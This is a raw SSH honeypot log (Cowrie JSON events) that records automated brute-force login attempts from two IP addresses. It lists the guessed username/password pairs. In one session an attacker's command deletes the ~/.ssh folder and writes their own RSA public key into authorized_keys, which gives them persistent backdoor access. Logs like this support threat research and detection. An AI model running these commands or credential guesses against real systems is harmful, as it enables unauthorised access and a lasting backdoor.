{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:05:51.190857Z","src_ip":"212.227.235.229","session":"851c8e3f2496"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:05:53.031669Z","src_ip":"212.227.235.229","session":"851c8e3f2496"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:05:53.306770Z","src_ip":"212.227.235.229","session":"e143844b26cf"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:05:53.308216Z","src_ip":"212.227.235.229","session":"851c8e3f2496"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55426,"dst_ip":"1.2.3.4","dst_port":22,"session":"a99fd5e3d9b1","protocol":"ssh","message":"New connection: 212.227.235.229:55426 (1.2.3.4:22) [session: a99fd5e3d9b1]","sensor":"my-vps","timestamp":"2025-08-31T05:05:55.500931Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:05:55.501641Z","src_ip":"212.227.235.229","session":"a99fd5e3d9b1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:05:55.773917Z","src_ip":"212.227.235.229","session":"a99fd5e3d9b1"}
{"eventid":"cowrie.login.failed","username":"gabriel","password":"gabriel","message":"login attempt [gabriel/gabriel] failed","sensor":"my-vps","timestamp":"2025-08-31T05:05:56.902110Z","src_ip":"212.227.235.229","session":"a99fd5e3d9b1"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:05:58.177398Z","src_ip":"212.227.235.229","session":"a99fd5e3d9b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36778,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2c9d1735b25","protocol":"ssh","message":"New connection: 212.227.125.160:36778 (1.2.3.4:22) [session: b2c9d1735b25]","sensor":"my-vps","timestamp":"2025-08-31T05:06:01.086080Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:06:01.508475Z","src_ip":"212.227.125.160","session":"b2c9d1735b25"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:06:01.509718Z","src_ip":"212.227.125.160","session":"b2c9d1735b25"}
{"eventid":"cowrie.login.failed","username":"server","password":"12345","message":"login attempt [server/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T05:06:04.381011Z","src_ip":"212.227.125.160","session":"b2c9d1735b25"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:06:06.031375Z","src_ip":"212.227.125.160","session":"b2c9d1735b25"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47902,"dst_ip":"1.2.3.4","dst_port":22,"session":"9386086fc9d2","protocol":"ssh","message":"New connection: 212.227.235.229:47902 (1.2.3.4:22) [session: 9386086fc9d2]","sensor":"my-vps","timestamp":"2025-08-31T05:06:06.929163Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:06:06.937642Z","src_ip":"212.227.235.229","session":"9386086fc9d2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:06:07.188230Z","src_ip":"212.227.235.229","session":"9386086fc9d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48422,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ea0c90cbe3a","protocol":"ssh","message":"New connection: 212.227.125.160:48422 (1.2.3.4:22) [session: 1ea0c90cbe3a]","sensor":"my-vps","timestamp":"2025-08-31T05:06:07.958168Z"}
{"eventid":"cowrie.login.success","username":"root","password":"!Qq123456","message":"login attempt [root/!Qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:06:08.194494Z","src_ip":"212.227.235.229","session":"9386086fc9d2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:06:08.727456Z","src_ip":"212.227.235.229","session":"9386086fc9d2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:06:08.728194Z","src_ip":"212.227.235.229","session":"9386086fc9d2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:06:08.729706Z","src_ip":"212.227.235.229","session":"9386086fc9d2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:06:08.987028Z","src_ip":"212.227.235.229","session":"9386086fc9d2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:06:09.547689Z","src_ip":"212.227.235.229","session":"9386086fc9d2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:06:09.548368Z","src_ip":"212.227.235.229","session":"9386086fc9d2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:06:09.801716Z","src_ip":"212.227.235.229","session":"9386086fc9d2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:06:09.802561Z","src_ip":"212.227.235.229","session":"9386086fc9d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49176,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a387c57a094","protocol":"ssh","message":"New connection: 212.227.235.229:49176 (1.2.3.4:22) [session: 3a387c57a094]","sensor":"my-vps","timestamp":"2025-08-31T05:06:10.049358Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:06:10.057479Z","src_ip":"212.227.235.229","session":"3a387c57a094"}
{"eventid":"cowrie.login.failed","username":"default","password":"1","message":"login attempt [default/1] failed","sensor":"my-vps","timestamp":"2025-08-31T05:06:10.144467Z","src_ip":"212.227.235.229","session":"bf6bef825313"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:06:10.305662Z","src_ip":"212.227.235.229","session":"3a387c57a094"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53798,"dst_ip":"1.2.3.4","dst_port":22,"session":"44b074293fb9","protocol":"ssh","message":"New connection: 212.227.235.229:53798 (1.2.3.4:22) [session: 44b074293fb9]","sensor":"my-vps","timestamp":"2025-08-31T05:06:10.980715Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:06:10.982083Z","src_ip":"212.227.235.229","session":"44b074293fb9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:06:11.063990Z","src_ip":"212.227.235.229","session":"44b074293fb9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:06:11.314385Z","src_ip":"212.227.235.229","session":"3a387c57a094"}
{"eventid":"cowrie.login.failed","username":"frappe","password":"frappe12345","message":"login attempt [frappe/frappe12345] failed","sensor":"my-vps","timestamp":"2025-08-31T05:06:11.433181Z","src_ip":"212.227.235.229","session":"44b074293fb9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:06:12.516757Z","src_ip":"212.227.235.229","session":"44b074293fb9"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:06:12.569356Z","src_ip":"212.227.235.229","session":"3a387c57a094"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50294,"dst_ip":"1.2.3.4","dst_port":22,"session":"f307bc3d8867","protocol":"ssh","message":"New connection: 212.227.235.229:50294 (1.2.3.4:22) [session: f307bc3d8867]","sensor":"my-vps","timestamp":"2025-08-31T05:06:12.815769Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:06:12.819201Z","src_ip":"212.227.235.229","session":"f307bc3d8867"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:06:13.065110Z","src_ip":"212.227.235.229","session":"f307bc3d8867"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:06:14.063883Z","src_ip":"212.227.235.229","session":"f307bc3d8867"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:06:14.316342Z","src_ip":"212.227.235.229","session":"9386086fc9d2"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:06:14.317215Z","src_ip":"212.227.235.229","session":"f307bc3d8867"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55492,"dst_ip":"1.2.3.4","dst_port":22,"session":"a989e0365c2b","protocol":"ssh","message":"New connection: 212.227.235.229:55492 (1.2.3.4:22) [session: a989e0365c2b]","sensor":"my-vps","timestamp":"2025-08-31T05:06:14.966158Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:06:14.967123Z","src_ip":"212.227.235.229","session":"a989e0365c2b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:06:15.242423Z","src_ip":"212.227.235.229","session":"a989e0365c2b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:06:16.084090Z","src_ip":"212.227.125.160","session":"1ea0c90cbe3a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:06:16.180886Z","src_ip":"212.227.125.160","session":"1ea0c90cbe3a"}
{"eventid":"cowrie.login.failed","username":"tester","password":"tester2023","message":"login attempt [tester/tester2023] failed","sensor":"my-vps","timestamp":"2025-08-31T05:06:17.128524Z","src_ip":"212.227.235.229","session":"a989e0365c2b"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:06:18.405182Z","src_ip":"212.227.235.229","session":"a989e0365c2b"}
